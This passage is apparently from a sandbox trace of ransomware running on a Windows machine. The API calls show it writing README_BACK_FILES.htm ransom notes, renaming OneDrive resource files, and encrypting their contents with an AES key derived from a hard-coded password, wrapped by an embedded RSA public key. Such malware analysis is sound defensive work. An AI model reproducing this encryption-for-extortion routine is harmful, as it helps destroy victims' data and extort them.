(lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.090] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0274.090] CryptDestroyKey (hKey=0x2fb108) returned 1 [0274.090] CryptReleaseContext (hProv=0x2f28c28, dwFlags=0x0) returned 1 [0274.090] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.090] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.090] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\readme_back_files.htm")) returned 0xffffffff [0274.091] AreFileApisANSI () returned 1 [0274.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.091] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.092] GetFileType (hFile=0x5d4c) returned 0x1 [0274.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.093] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.093] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.094] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.094] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.094] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.094] GetLastError () returned 0x0 [0274.095] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.095] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.096] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.097] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.099] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.100] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f29750) returned 1 [0274.102] CryptCreateHash (in: hProv=0x2f29750, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.103] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.103] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.103] CryptDeriveKey (in: hProv=0x2f29750, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2faac8) returned 1 [0274.103] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.103] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.103] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ab80) returned 1 [0274.104] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ab80, dwCertEncodingType=0x1, pInfo=0x2f336e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33710*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33718*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb108) returned 1 [0274.104] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.104] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2ac08*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2ac08*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.104] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2ac08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2ac08*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.117] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.125] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.126] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.131] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | 